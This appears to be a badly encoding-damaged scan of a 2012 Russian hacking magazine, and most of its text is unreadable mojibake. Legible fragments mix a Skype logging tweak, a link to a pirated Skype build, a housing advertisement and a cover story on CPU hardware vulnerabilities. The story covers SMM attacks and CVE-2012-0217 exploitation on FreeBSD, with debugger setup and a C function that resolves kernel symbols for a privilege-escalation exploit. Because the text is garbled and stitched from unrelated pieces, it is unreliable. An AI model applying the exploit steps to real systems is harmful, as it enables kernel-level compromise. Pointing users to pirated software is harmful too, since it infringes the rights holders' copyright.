TOT )&!(VWN(KO'W IP-265,82 4./0?.;29,/,@ <>2?2E7 ; .9/26.J-E7= /.B2= (developer.skype.com/SkypeGarage/LogFile), E. ; .-7JE.@ ;,58:: >/:,E92 Skype M9: /.B: ?21:C5.;2E7. !.M9.A< E<GE. 86,-/290 6;, ;,F::1. +,&-.'$/ )#0'1/ &%2%3. K 5,,895,

Windows 6.-2;/3,A >/IJ ; 52?6,/,[HKEY_CURRENT_USER\Software\Skype\Phone\UI\General]:

"Logging" ="SkypeDebug2003"

!.8/, M9.B. log-C2@/7 9:42 debug-YearMonthDate-time.log 8.?62I983 ; 424>, Skype.

2. 4#051$'$/ 67%8951:'*%3#"";( ,&'-7"$ Skype 5.5 '&' 5.9 (thepiratebay.se/torrent/7238404), ; >.9.5.A .9/26.JE7, /.B: ?24:87;2I983 ; 5281:C5.;2EE.A ;:6,.

T.B62 ;8, B.9.;., E<GE. 86,/290 92>, J9.-7 ?24:80 . E<GE.A >.E92>9, 4.42/2 ; .9/26.J-E7@ /.B. $/3 M9.B. 6.8929.JE. ;7-5290 ; A,EI C<E>H:I «$.-2;:90 >.E92>9» — : <>2?290

!"#"$%&'($)%*+ &%,"-./0&+ " #-"!/1( 23/-'&- 3 12 «%/ 345"'(» ."1%" #"$*6&') 3 ",&5( #-"!/1 2".#/%&& «."%"$&' #$+5»

!"#$%&'() *" +"$"*% , -,."+" /"01.2/(% «3% 45("&2» 0"-6" "& 0. 7!38 6% 0%$9$:&6"0 &%/(, ; 392 ,., ( <$"(.%4(/"+" 4"/=%.% 6% 1$,+"$"*6"> ?.2/&$,@/2 *" (&. A".924". 7$20) 4 1:&, 6% (/"$"(&6"> ?.2/&$,@/2 «B1:&6,/» *" (&%6C,, 02&$" «D"0("0".'(/%)» =%6,0%2& 4(2+" 25 0,6:&.

«."%"$&' #$+5» #-(!$/7/(' #-"5'"-%4( 23/-'&-4 5"3-(.(%%"8 #$/%&-"32& 3 5-'& 5(20&"%%". !".( #(-(.(%%"8 9'/1%"5'&.

&#"'(2/«!"#"$%& '$()» *+&%,#" -*."&*/& ) ,/012%3% .*#+*-3% '" '-"4-*33*3 %'"&/5#"4" +-/0%&",*#%6. 7)"."/ ,#%3*#%/ 10/$6/&)6 '-*,","8 9*2%2/#-#")&% +$%/#&",, '-%".-/&*&/$/8 :%$;6 % #/:%$<= '"3/2/#%8.

Ñæëìáíá

!"#$%&' ($)$*"+ – ,)-./+01, .$+)"2"&&01, ,$23$)4&01 #$)$%, #$)$% ,$.2/5".,$#$ ,$)-6*".4)$"&/', ,$4$)01 ."#$%&' -,4/+&$ 7-.4)-/+-"4.'. 8$)$% $)/"&4/)$+-& &- 2$*$-%09 / :&")#/5&09 *;%"1. <4$ .-2$%$.4-4$5-&01 #$)$%, $6".="5/+-;>/1 +." =$4)"6&$.4/ *;%"1 7%".? / ."15-.. @%".? .$5"4-;4.' +." =)"/2A>".4+- #$)$%.,$1 .)"%0 . =)",)-.&$1 =)/)$%$1: 2&$B".4+$ =-),$+, + 4$2 5/.*" / «C$./&01 $.4)$+», )",- (*'7?2-.

DA%A>/" &$+$."*0 2$#A4 +06)-4? ,+-)4/)A ,-, &- $%&$#$ 5"*$+",-, 4-, / %*' 6$*?E$1 ."2?/. F %$2" =)"%.4-+*"&0 ,+-)4/)0 $4 1 %$ 4 ,$2&-4. C =$%)$6&02/ .9"2-2/ =*-&/)$+$, ,+-)4/) / =)$",4&$1 %",*-)-G/"1 2$B&$ $7&-,$2/4.' &- .-14" www.gk-monolit.ru

D-*,$&0 / *$%B// $.4"-,*"&0, 54$ =)/%-"4 %$2A :*"#-&4&$.4? / .$9)-&'"4 "%/&01 -)9/4",4A)&01 .4/*? B/*$#$ ,$2=*",.-.

H- 4"))/4$)// )-.=$*$B"&0 6*-#$A.4)$"&&0" %"4.,/" =*$>-%,/ / =*$>-%,/ %*' -,4/+&$#$ $4%09-, #$.4"+-' .4$'&,-. I)"%A.2$4)"&- =$%7"2&-' =-),$+,-.

!"#$"%#$&' "()&#*+, ,. $"-").%, /-".01 !&$&-.2$", 1. 1

!"#$%&' ($)$*"+ – ,)-./+01 .$+)"2"&&01

(495) 516-40-04

0&" «!"2")3* /)4#» – 32%.#*353"22"-#*-"3*.)+2&' $"!/&23', %6"13* % #"#*&% ,-7//8 $"!/&239 «!"2")3*», -&("*&4:.9 % !"#$"%#$"9 "()&#*3 # 1989 ,"1&.

($2=-&/' $.A>".4+*'"4 =$*&01 .=",4) A.*A# + =)$G".." )"-*/7-G// .4)$/4"*?&09 =)$",4$+. 8$% 7- #$%$2 ,$2=-&/' «J$&$*/4 =*;.» .$+")E"&.4+A"4 4"9&$*$#// /&+".4/)$+-&/', +0=$*&'"4 3A&,G// 4"9&/5".,$#$ 7-,-75/,- / 3A&,G// 4"9&/5".,$#$ &-%7$)- 7-,-75/,- 7- .4)$/4"*?.4+$2 $6K",4$+.

Sanjar Satsura (satsura@r00tw0rm.com, twitter.com/sanjar_satsura)

!"#$% 09 /164/ 2012020

COVERSTORY

!"#$%&' ()*$ +$#$ ,%-.-/0 1+23*$45)(- %*' 6)7&89 $3"6):-$&&89 2-25"( - 36$#6)((&$#$ $;"23"<"&-'. =22*"%$.)5"*- &),<-*-20 $;9$%-50 6)7*-<&$#$ 6$%) 7)>-58, 5)+-" +)+ DEP, ASLR, NX bit, 5)+ &)78.)"(,? 3"2$<&-:,, 1(,*'5$68 +$%) - 36$<-" 2-25"(8 .-65,)*-7):--. @6"(' ("&'"5 (&$#$": ">" .<"6) ,'7.-($25- . )33)6)5&$( $;"23"<"&-- ;8*- $;A"+5$( B)&5)7-4 -22*"%$.)5"*"4 =C, 2"#$%&' 15$ 6")*0&$250. D 6)22+)E, 5";" $ «E"*"7&89» 1+23*$45)9 - ()*.)6-.

!"#"$%&' ()*+#,-

!"#$% #&'"( )*+#&'&,

-(./0"%'"# @@FGFH=F I6"%25).0, + <"(, ($E"5 36-."25- $;&)6,E"&-" ,'7.-($25- . (-+6$36$:"22$6". I$2*" 1+23*,)5):-- 5)+$4 $/-;+- ,E" &" &,E&$ $;9$%-50 +)+-"-*-;$ 26"%25.) 7)>-58 J!. K5$ &"()*$-.)E&$, 3$65-6$.)&-" 5)+$#$ 1+23*$45) %*' 6)7&89 J! &" ;,%"5 36"%25).*'50 +)+$4-*-;$ 2*$E&$25-. L5$ 2.'7)&$ 2 6")*-7):-"4 HAL (Hardware Abstraction Layer — 2*$4 )33)6)5&89 );256)+:-4), ) 5)+E" 2 5"(, <5$ &-7+$,6$.&".8" +$(3$&"&58 '%6) %*' 6);$58 2 $;$6,%$.)&-"( &) (&$#-9 J! 36)+5-<"2+- $%-&)+$.8. I$(--($ 15$#$, $2&$.&8( 36"-(,>"25.$( 1+23*$45$., 7)5$<"&&89 &) 9)6%.)6&8" ,'7.-($25-, '.*'"52' .$7($E&$250 56)&2B$6():-- ."+5$6) 1+23*,)5):-- 2 ,%)*"&&$#$ &) *$+)*0&84 (remote2local) - &)$;$6$5 (local2remote). M)+ 58 ,E" 3$&'*, 56)&2B$6():-' ."+-5$6) 1+23*,)5):-- 2 *$+)*0&$#$ &) ,%)*"&&84 36"%25).*'"5 %*' &)2 &)-;$*0/-4 -&5"6"2 :). I6).%), -&$#%) 36- 56)&2B$6():-- (-&--B-*0568 '%6) $;6"7)?5/-2+)E)?5 $;6);)58.)"(8" %)&&8" (36).-*) (-&--B-*056$. $;8<&$ 3$'.*'?52' 3$2*" $<"6"%&89 3)5<"4, &)36-("6 3$ .5$6&-+)(), &$ - 15$ &" 3$("9). J;9$% 2$25$-5 -7 36-("&"&-' ($6B)/.-65,)*-7):-- +$%) -*- 23":-)*0&$ 7)-#$5$.*"&&89 #)%E"5$..

K5$;8 58 3$&-()*, &)2+$*0+$ 2-5,):-' +6-5-<"2+)', 6)22($-56-( &)#*'%&84 36-("6, 6)7*$E"&&84 &) &"2+$*0+$ $2&$.&89 15)3$..1. N*$,(8/*"&&-+ 3$28*)"5 3$%#$5$.*"&&84 TCP- -*- UDP-3)+"5

&) *?;$4 $5+68584 3$65 :"*".$4 ()/-&8.2. I)+"5 36$9$%-5 <"6"7 2"5".,? +)65,, .878.)' -2+*?<"&-",

+$5$6$" 3*)&-6$.>-+ '%6) 25).-5 . $<"6"%0. O)+ +)+ 36-$6-5"5 &)/"#$ -2+*?<"&-' .82$+, 36- .85"2&'?>"4 (&$#$7)%)<&$25- 3*)&-6$.>-+) J! 3)+"5 ;,%"5 $;6);$5)& '%6$( -2+*?<-5"*0&$ ;8256$, 36$4%' 2+.$70 3$*8(' (-&--B-*056$. - .256$"&&$#$ ($&-5$6) ;"7$3)2&$25- '%6).

!"#"$%&' ()*+#,-

!"#$% 09 /164/ 2012 021

!"#$%"& "'()*& + )*,'-.#/% GDB

!0%+-)1'"-+'"2&% 03,)#*& 0 exploit-db.com

3. ./( 0)("1 /0*,0/1,% 2"%1*,#3%&4 456*/7*/2"88/*/4 5#5 6/%-6*"1%&4 6/%1*/##"*/4 (9 *":54" DMA), (#; 6/1/*/-/ 7*"(%,$%,-<,#,83 7/*25; (,%%&=, (/81,9#"%%,; *,884,1*59,"4&4 7,6"1/4.

4. > 51/-" 54""4 7/*,0/?"%%)@ 4,+5%).5. PROFIT! :)

ABC BDEF «!BGBHIJB» K.LMGNOFJ D#; 7/#%/-/ 7/%54,%5; 8)15 9"?"' *,884/1*54 /8%/9%&" P1,7& 9&;9#"%5; 5 P687#),1,255 );$954/81"' 9 :"#"$".1. Q%,#5$ — ,%,#5$ /0/*)(/9,%5; %, 7*"(4"1 9&;9#"%5; /+50/6

5 );$954/81"'. L)?"819)"1 (9, 157, ,%,#5$, — 81,15<"865' (/% :" *"9"*8-5%:5%5*5%-, (/81,1/<%/ 1*)(/"465') 5 (5%,45<"865' («dummy» 5 +,0#/%%&' R,$$5%-). > 7"*9)@ /<"*"(3 1& (/#:"% $%,13 0,$/9)@ 4,1<,813 (84. 88&#65), P1/ 7/4/:"1 1"0" (/815<3 7/%54,%5;, <1/ 54"%%/ %"/0=/(54/ ,%,#5$5*/9,13. L/9*"4"%%&" 456*/7*/2"88/*& 54"@1 89/5 8#,0&" 4"81,, 6 /8%/9%&4 5$ %5= 81/51 /1%"815 0#/65 ("6/(5*/9,%5; CISC-456*/6/4,%( 9 RISC-6/4,%(&, /0*,0/1<565 586#@<"%5', 0#/65 8/81/;%5'.

2. M*/9"*6, 7/#)<"%%&= (,%%&= — %, P1/4 P1,7" 7/#)<"%%&" (,%%&" %,<5%,@1 /0*,0,1&9,138;, 7*/9/(518; /10/* «P687#),-1,0"#3%&=» /+50/6, 1/ "813 7/1"%25,#3%&= );$954/81"' (5?5 58=/(%565 %, %,+"4 DVD — R,'# src/core2duo_errata).

3. I,758,%5" PoC (9 7"*87"6159" — 0/"9/-/ P687#/'1,) — 8/$(,%5" %,-#;(%/ ("4/%81*5*)@?"-/ /+506) Proof-of-Concept P687#/'1,. K1/ 4/:"1 7/4/<3 (*)-54 588#"(/9,1"#;4 5 *,$*,0/1<56,4 *,$/-0*,138; 9 7*/0#"4", 587/#3$); 8/0819"%%&' 7/(=/(. L2"%,*55 P687#),1,255 );$954/81"' 7*,615<"865 %" /1#5<,@18; /1 8/-R19"*%&=:a) Local privilege escalation — #/6,#3%/" 7/9&+"%5" 7*595-

#"-5'. L@(, :" 4/:%/ /1%"815 jailbreak’5 5 9&7/#%"%5" 6/(, 9 ring 0;

() Remote exploitation — )(,#"%%&' $,=9,1 )7*,9#"%5;;+) Denial of Service — /16,$ 9 /08#):59,%55. N<"%3 PRR"6159%/

7*54"%;13 (,%%/-/ */(, P687#/'1& 7*/159 ,77,*,1%&= R,'*-9/#/9.

.GQLLSTS.QUSE VEH>SCNLFBO S >NHCN!IJB IQMWQ>GBISE SLLGBDN>QISO V;$954/815 9 :"#"$" 4/:%/ *,$("#513 %, (9, 7/(6#,88, — 78"9-(/,77,*,1%&" 5 ,77,*,1%&".1. !0%+-)'33'"'*2&% 456+#$)0*#. S= 0/#3+5%819/, 5 545 65+,1

7)0#5<%&" 0,$& P687#/'1/9 (exploit-db, 1337day, *,$("# hardware). C%/-5" 9&(,@1 5= $, ,77,*,1%&". I, 8,4/4 ("#" /%5 ;9#;@18; 78"9(/,77,*,1%&45, 7/1/4) <1/ P687#),15*)@1 /+506) %" 9 8,4/4 /0/*)(/9,%55, , 9 7*/+596"/(*,'9"*"/CRM (8581"4" )7*,9#"%5;, 6/1/*,; 4/:"1 0&13 7*"(81,9#"%, 9 95(" 9"0-7,%"#5, SSH, Telnet 5#5 (*)-/-/ 7*/1/6/#, 7"*"(,<5 5%R/*4,255 5 )7*,9#"%5;). M*54"* 78"9(/,77,*,1%&= );$954/81"', 5%R/*4,25; / 6/1/*&= =*,%518; 9 0,$" exploit-db, 7*"(81,9#"% %, 5##@81*,255. S= %"-8#/:%/ 6#,885R525*/9,13 7/ 157) );$954/81"':

a) 456+#$)0*# *#3' «!%"%3),2%2#% (47%"'». M*54"*: Xerox Workcenter 4150 Remote Buffer Overflow PoC (bit.ly/NLCZvr). V;$954/813 $,6#@<,"18; 9 %"7*,95#3%/' /0*,0/16" /(%/-/ 5$ 7,*,4"1*/9 (LANGUAGE) 7*5 8/$(,%55 $,(,<5 7"<,15;

() 6'8#*&% 3'"),#, /,9.# (0)7*+%"2&: (;/-)"). M*54"*: F5 BIG-IP Remote Root Authentication Bypass Vulnerability 0-day (bit.ly/KS2DPR). V;$954/813 $,6#@<,"18; 9 587/#3$/9,%55 $,+51/-/ 9 8581"4) SSH-6#@<,, /0#,(,; 6/1/*&4 ,1,6)@?5' 4/:"1 7/#)<513 (/81)7 6 2"#"9/' 8581"4".

+) <56+#$)0*# +%(-3"#,)=%2#: (SQLi, XSS, CSRF, LFI, RFI, Auth Bypass # *'/ -',%%) M*54"*: Huawei HG866 Authentication Bypass (bit.ly/MgHJsm). V;$954/813 $,6#@<,"18; 9 1/4, <1/ %" 98" 86*571& 7*/9"*;@1 %,#5<5" 9,#5(%/' 8"8855 9 6)6,=, <1/ 7/$9/#;"1 84"%513 7,*/#3 ,(45%581*,1/*,.

2. >33'"'*2&% 456+#$)0*# — P1/ );$954/815, 89;$,%%&" 8 7*/"615-*/9,%5"4 ,77,*,1%&= 8="4.

M*5 7*/"615*/9,%55 7*/2"88/*%&= 456*/8="4 5 0/#""-4"%"" 8#/:%&= 456*/6/%1*/##"*/9, *,9%/ 6,6 5 7*5 8/$(,%55 8#/:%/-/ 7*/-*,44%/-/ /0"87"<"%5;, 4/-)1 9/$%56%)13 *,$-#5<%/-/ */(, /+5065. A,813 5$ %5= 4/-)1 81,13 7/1"%25,#3%&45 );$954/81;45, 6/1/*&" 8/$(,@1 «(&*&» 9 :"#"$". B8#5 (&* 81,%/9518; <"*"8<)* 4%/-/, 1/ 1,6/" :"#"$/ ("#,"18; 7/=/:54 %, ()*+#,-. F,6 8#)<5#/83 8 7*/()625"' 6/47,%55 Intel 9 %,<,#" 90-=, 6/-(, /+5065 9 CPU P1/-/ 7*/5$9/(51"#; -*"0#5 #/7,1/'. K1/ %/*4,#3%/ (#; 6/47,%55 8 %"0/#3+54 +1,1/4 87"25,#581/9 5 /18)18195"4 1"815*/9,%5;. M/ 4"*" */81, 6/47,%55 Intel 9 "" 8/81,9" %,<5%,@1 7/;9#;138; /1("#& 1"815*/9,%5;, /1#,(65 456*/7*/2"88/*%&= 8="4. > 6/%"<%/4 51/-" 54"%%/ 0#,-/(,*; 54 6/#5<"819/ );$954/81"' 89/(;1 7*,615<"865 6 %)#@. L7)81; %"6/1/*/" 9*"4;, , 54"%%/ 9 %,<,#" 2006 -/(,, (#; 7*/2"88/*/9 8"*55 Intel Core2Duo/Solo 9&=/(51 %"/R525,#3%,; errata (89/( /+50/6), 7/(-/1/9#"%%,; 7,*%;45 8 8,'1, geek.com. M*54"*%/ <"*"$ (9, 4"8;2, ($,4"13, 6,6/' 8*/6, 5 P1/ "?" %" 7*"("#) 7/8#" 9&=/(, %"/R525,#3%/-/ 89/(, /+50/6 Intel %"=/1; 7*5$%,"1 5=

!"#$% 09 /164/ 2012022

COVERSTORY

! "#$%& 2011 '()# *+,&-%.#/ $0%1*%(2*-#%&34.*5# 67(#..# 80%1(,-1#/ (Joanna Rutkowska) (2093*1(,#3# *.:($"#5*; (9 0/+,*"(-%* , 2$(5&--($#< Intel, 2(+,(3/;=&> ,?2(3.*%4 2$(*+,(34.?> 1() , $&7*"& SMM - 2$*,*3&'*/"* 9(34@*"*, A&" 2$*,*3&'** .03&,('( 1(345# (ring 0).

SMM (System Management Mode) — B%( -2&5*#34.?> "#3()(10"&.%*$(,#..?> $&7*" $#9(%? 2$(5&--($(, Intel, 1(%($?> ,2&$,?& 2(/,*3-/ , 386SL. ! B%(" $&7*"& 2$*(-%#.#,3*,#&%-/ .($"#34.(& ,?2(3.&.*& 1()# * -2&5*#34.(& CD ((9?A.( firmware *3* (%3#)A*1 - #22#$#%.(> 2())&$71(>) ,?2(3./&%-/ , $&7*"& - ,?-(1*"* 2$*,*3&'*/"*.

E1-23(>%? *-2(34+0;% 1&@ 2$(5&--($# )3/ )(-%02# 1 SMRAM — +#=*=&..(> 2#"/%* )3/ $&7*"# SMM. F+ ),0< 2$&)-%#,3&..?< B1-23(>%(, ()*. )&3#&% )#"2 2#"/%* SMRAM, # ,%($(> 2$(*+,()*% ,?2(3.&.*& 1()# , $&7*"& SMM.

C(%&.5*#34.(& 2$*"&.&.*& 0/+,*"(-%* 2$*,&3( 1 2(/,3&.*; SMM-$0%1*%(,, 1(%($?& 1("2$("&%*$(,#3* $#9(%0 '*2&$,*+($(, * (9<()*3* -(,$&"&..?& +#=*%? DG .# %(% "("&.%. F+,&-%.(, A%( Intel 9?3# (-,&)("3&.# ( )#..(> 0/+,*"(-%*, — (.# *-2$#,*3# && , "#%&$*.-1(> 23#%& DQ45CB, <(%/ 9(3&& $#..*& "()&3* (-%#3*-4 0/+,*"?"*, # 2#%A#, 1 -(7#3&.*; — # "(7&%, * 1 -A#-%4; ;), — .& 2(/,*3(-4 2( -&> )&.4.

CACHE POISONING !"# $%&'())&%&*

! "#$%!& " $'!(!)*+#,- errat',. ., /)0! 1)1 /)0!, #!230$ 45!-632)&3*+#$0$ — 6$7#$ 4$8,6)&+ #) 435"9: ";0*<8. = $>!/!&+%< :). ?%$/9: !#&353% 4538%&)"*<*! /)0!, 1$&$593 #3%*! " %3/3 4$&3#(!)*+#,- ,<;"!6$%&+ (AE1/2/4/5/6/9/12/13/16/17/18/20/21/30). @ &$& 6$63#& 6#$0!3 #3 $/5)&!*! "#!6)#!< #) A&$ %$/9&!3, ;) !%1*-23#!36 #3%1$*+1!B !%%*38$")&3*3:, $8#!6 !; 1$&$59B /9* C3$ 83 D))8& (Theo de Raadt). @ %"$!B 8$1*)8)B $# 4538,453-78)* $ "$;6$7#9B 4$%*38%&"!<B, 1 1$&$596 6$0,& 45!"3%&! #):83##93 $>!/1! " Core2Duo. E#$0!3 A1%435&9 4$ =F 4$%2!&)*! 30$ "9%1);9")#!< 4)5)#$!8)*+#96! ! 1$6!2#96!, 4$%63<-*!%+… ! 8$%63<*!%+ :). @ %3538!#3 2007 0$8) " G3&! 4$<"*<3&%< !#'$56)(!< $ /$&3 #$"$0$ 4$1$*3#!< % 5,&1!&-',#1(!$#)*$6 8*< 45$69>*3##$0$ >4!$#)7) (Stuxnet, $/*$6!%+), )"&$5$6 1$&$5$0$ <"*<*)%+ #31)< Selena, 4538%&)"!&3*+#!() 1!&):%1$0$ )#8305)-,#8). H*< 5)%45$%&5)#3#!< /$& !%4$*+;$")* $8!# !; ,#!1)*+#9B A1%4*$:&$", 1$&$59:, "435"93 " 6!5$"$: 45)1&!13, A1%4*,)&!-5$")* «73*3;#,-» ,<;"!6$%&+, ) !63##$ /)0 " 1$#&5$**353 13>) Core2Duo, <"*<">30$%< #) &$& 6$63#& 4$4,*<5#96 53>3#!36 8*< 6#$0!B %35"35#9B %!%&36 (A&$& 45$( $/3%432!")* "3*!1$*34#$3 %$$&#$>3#!3 (3#)/45$!;"$8!&3*+#$%&+). I$;8#33, " 2008 0$8,, J5!% J)%435%1! 53>)3& 531$#%&5,!5$")&+ A1%4*$:& 8*< 8)##$: ,<;"!6$%&!. @ 1)23%&"3 45!635) $# !%4$*+;,3& %A64* 5,&1!&), 4$*,23##9: , &$: %)6$: Selena, #$ !;"*32+ %)6 A1%4*$:& !; &3*) 5,&1!&) 36, &)1 ! #3 ,8)*$%+. .) 1$#'353#(!- HITB2008 $# 45!-"3; «"985)##,-» 53"35%-!#7!#!5!#0$6 %43(!)*+#$ %1$#%&5,!-5$")##,- "!5&,)*+#,- 6)>!#, (VM) ! VM-/):&1$8 A1%4*$:&). K)8)23: A1%4*$:&) /9*$ *$1)*+#$3 4$"9>3#!3 45!"!*30!: 8*< 5,&1!&), " &3*3 1$&$5$0$ $# ! 5)%4$*)0)*%<. L%*! 4$5)%1!#,&+ 6$;0)6!, &$ $&53"35%3##9: A1%4*$:& J5!%) 6$7#$ /3; $%$/9B ,%!*!: &5)#%'$56!5$")&+ !; *$1)*+#$0$ " ,8)*3##9: (63&$8 local2remote). @ ;)"!%!6$%&! $& (3*3: A1%4*,)&)(!! "983*<-& 8") 4,&! &5)#%'$56)(!!:

1. elf-remote +,-./012 — 4538%&)"*<3& %$/$: HTML-%&5)#!21, % "#3853##96 1$8$6 A1%4*$:&) #) 4$4,*<5#$6 %15!4&$"$6 <;913 (JS, Java, AS3). J)1 &9 4$#<*, 8*< A1%4*,)&)(!! ,<;"!6$%&! #3-$/B$8!6$ /,83& ;)"*32+ 4$*+;$")&3*< #) A&, %&5)#!(, :). @ B$8 6$73& !8&! "%3, #)2!#)< % %$(!)*+#$: !#73#35!! ! ;)1)#2!")< "3/->3**$6 #) 4$4,*<5#$6 %):&3;

2. full-remote +,-./012 — stand-alone 45$05)66), 4$%9*)-M)< %43(!)*+#$ %'$56!5$")##9: TCP/IP-4)13& 1$64+-&35, 735&"9.

J)789: !; 5)%%6$&53##9B 4,&3: !633& %"$! 4*-%9 ! 6!#,%9. E#3 4$1);)*$%+, 2&$ 45$"3%&! &5)#%'$56)(!- 4$ 435"$6, 63&$8, /,83& #)!/$*33 "90$8#96 ! #)0*<8#96 8*< &3/<. I538*)0)- &3/3 $;#)1$6!&+%< % ;)5)#33 4$80$&$"*3##96 %4*$!&$6, 53)*!;$")#-#96 #) JS, &9 6$73>+ #):&! 30$ #) #)>36 8!%13 (src/cpu_bug_src).

CVE-2012-0217 I3538 #)6! ,<;"!6$%&+ " 45$(3%%$5)B Intel, ) !63##$ — 0-day #)>!B 8#3:, 1$&$59: /9* $&6323# D)')*36 @$:2,1$6 (Rafal Wojtczuk) %$ %&)&,%$6 Critical. I$ !5$#!! %,8+/9, ,<;"!6$%&+ /9*) !%45)"*3#) " Linux 3M3 " 8)*31$6 2006-6 (6#$0!3 33 ;#)-& 1)1 CVE-2006-0744), #$ &$08) 6)*$ 1&$ $/5)&!* #) #33 "#!6)#!3, ) Intel " $23538#$: 5); $&6)B#,*)%+, 45!%"$!" )"&$5%&"$ 8)##$: ,<;"!6$%&! 5);5)/$&2!1)6 <85) N!#,1%. J)1 &9 4$#<*, $%#$"#$: 4*-% 8)##$: ,<;"!6$%&! " &$6, 2&$ $#), <"*<<%+ B)58")5#$:, 4$;"$*<3& 45$/!&+ /$*+>!#%&"$ !; %,M3%&",-M!B ?G (FreeBSD, NetBSD, Solaris, Windows) ! %!%&36 "!5&,)*!;)(!! (XEN, KVM). @ Linux $#) 4$<"!*)%+ " "!83 534$5&) $& 1$64)#!! Red Hat (RHSA-2012:0720-1, RHSA-2012:0721-1). I5!2!#) "$;#!1#$"3#!< 8)##$: ,<;"!6$%&! " &$6, 2&$ Intel’$"%1!: 6!15$45$(3%%$5 #31$5531&#$ BA#8*!& 1)#$#!23%1!: )853% 8$ 43531*-23#!< " #345!"!*30!-5$")##9: 537!6 (r0 ĺ r3). @ AMD-45$(3%%$5)B 8)##)< $435)(!< "94$*#<3&%< c &$2#$%&+- 8$ #)$/$5$&: %#)2)*) 6!15$45$(3%%$5 43531*-2)3& 1$8 " #345!"!*30!5$")##9: 537!6 (r3) ! &$*+1$ 4$-%*3 A&$0$ "9;9")3& #GP. C)1!6 $/5);$6, 45! ,%&)#$"13 4$*+;$")-&3*36 ,1);)&3*< !#%&5,1(!: RIP #31)#$#!23%1$0$ "!8) 45$(3%-%$5 "9;9")3& $/5)/$&2!1 $>!/1!, 1$&$59:, /,8,2! 3M3 " ring 0, ;)4,%&!&%< % "9/5)##96! 4$*+;$")&3*36 ;#)23#!<6! 530!%&5$" %gs ! %rsp.

O #)83-%+, &9 ,*$"!* %,&+ /)0!. H)"): 5)%%6$&5!6 &3B#!1, A1%-4*,)&)(!! #) 45)1&!13 #)4!%)#!< %4*$!&) 8*< FreeBSD. @ 45$(3%-%3 33 53)*!;)(!! #,7#$ "94$*#!&+ %*38,-M!3 >)0!:1. @9/$5 %4$%$/) $&*)81! <85), #)%&5$:1) $&*)82!1) ($&*)81)

$&*)813 5$;#+ ""!8, 1)58!#)*+#9B 5);*!2!: " "!5&,)*+#9B 6)>!#)B).

2. G/$5 4$"35B#$%&#$: !#'$56)(!! $/ ,<;"!6$%&! 4$ %&5,1&,5)6 ! $/P31&)6 <85).

3. G$/*-83#!3 45)"!* A1%4*,)&!5$")#!< 4$8$/#$0$ 5$8) ,<;"!6$%&3::• <85$ 8$*7#$ 5)/$&)&+ 1$5531&#$, !#)23 %!%&36) ,:83& " 8),#;• #3$/B$8!6$ 1$5531&#$ "$%%&)#$"!&+ %&5)#!(, !%1*-23#!<

$>!/$1 (general page fault exception — #GP);• #3$/B$8!6$ 4$"9%!&+ 45!"!*30!! ! "94$*#!&+ 1$8 " ring 0.

4. I5$05)66#)< 53)*!;)(!< A1%4*$:&).

I$3B)*!! I35"96 83*$6 8*< A&!B (3*3: #3$/B$8!6$ #)%&5$-!&+ "!5&,)*1, — %*$7#$ 2&$-&$ 83*)&+, 1$08) &"$< 1*)"!)&,5) 6!0)3& 4$8 5!&6!2#,- 6,;91, kernel panic :). N!2#$ 6$: "9/$5 4)* #) VMware !;-;) 85,73*-/#$0$ !#&35'3:%) $&*)81! 0$%&3-"$: ?G. @ 1)23%&"3 $%#$"#$: ?G (#) 1$&$5$: 45$B$8!*) $&*)81)) ! 0$%&3"$: (?G 8*< &3%&$") /9*) "9/5)#) %&)/!*+#)< "35%!< FreeBSD 9.0. .)%&5$:1) "!5&,)*+#$: 6)>!#9 45$%&) 8$ /3;$/-5);!<:

WARNING

*-3 4560789:43 .7;<0-29=/;59 4-,/>?42;/@50 = 0A59,0842;/@5BC :;/3C.D4 7;<9,:43, 54 9=207 5; 5;-E2 02=;2-2=;550-24 A9 />F01 =0A80G5B1 =7;<, .74?45;55B1 892;749/984 <95501 -292@4.

!"#"$%&' ()*+#,-

!"#$% 09 /164/ 2012 023

!"#$% &'()*+%,%-..

CVE-2012-0217 / 0#1(,/..

1. ./$(,"0 %/1)2 13*4),#5%)2 0,+3%) 1 VMware.2. 647*&1,"0 7/%83-)*,93/%%&' 8,'#, :/$(,%%&' VM (30""4 *,:-

+3*"%3" vmx), 3 (/;,1#<"0 :#"()2=)2 :4*/7):

debugStub.listen.guest64 = "TRUE"

>/:#" ?"-/ @*3 $,@):7" :/$(,%%/' VM VMware (#< /4#,(73 /47*/"4 #/7,#5%&' @/*4 8864, 7 7/4/*/0) 0/A%/ ;)("4 :@/7/'%/ @/(7#2?345:< 3$ #2;/-/ /4#,(?37,, 7 @*30"*) GDB:

(gdb) target remote localhost:8864

64#,(?37 GDB (#< B43C 9"#"' 4,7A" :4/34 :7/%83-)*3*/1,45 :,0/:4/<4"#5%/ (#< 7/**"74%/-/ /4/;*,A"%3< :301/#/1 /4#,A3-1,"0/-/ /7*)A"%3<:

> sudo port install gettext gmp libelf> curl -O http://ftp.gnu.org/gnu/gdb/gdb-7.4.1.tar.bz2...> tar xvjf gdb-7.4.1.tar.bz2...> cd gdb-7.4.1> CFLAGS=-I/opt/local/include ./confi gure \ --prefi x=/opt/local \ --program-suffi x=-amd64-marcel-freebsd \ --target=amd64-marcel-freebsd...> make> sudo make install

D) 3 %,7/%"9, :/$(,"0 (3*"74/*32 (#< /4#,(73, 7 @*30"*) poc_debug, 3 7/@3*)"0 4)(, 3:C/(%&" (3*"74/*33 FreeBSD /usr/src 3 /boot/kernel, 1 7/4/*&C %,C/(<4:< 3:C/(%373 (#< /4#,(73 (:0. *3:)%/7 «>*30"*& *,;/4& 1 /4#,(?37" GDB»).

. %,:4*/'7/' /4#,(?37, *,$/;*,#3:5, @*3:4)@,"0 7 :;/*) 3%8/*0,933. E/ 1*"0< B7:@#),4,933 )<$130/:43 %,0 @/%,(/-;34:< 3%8/*0,93< (:301/#&), 7/4/*,< *,:@/#,-,"4:< 1 ,(*":%/0 @*/:4*,%:41" <(*,. E/ FreeBSD ":45 1:4*/"%%,< 8)%793< kldsym(), 7/4/*,< @/$1/#<"4 «(/:4,45» %)A%&" %,0 :301/#&, @*"(/:4,1#<"-0&" <("*%/' 8)%793"' get_symaddr().

u_long get_symaddr(char *symname){ struct kld_sym_lookup ksym; ksym.version = sizeof (ksym); ksym.symname = symname;

if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) { perror("kldsym"); exit(1); } printf("[+] Resolved %s to %#lx\n",\ ksym.symname, ksym.symvalue); return ksym.symvalue;}

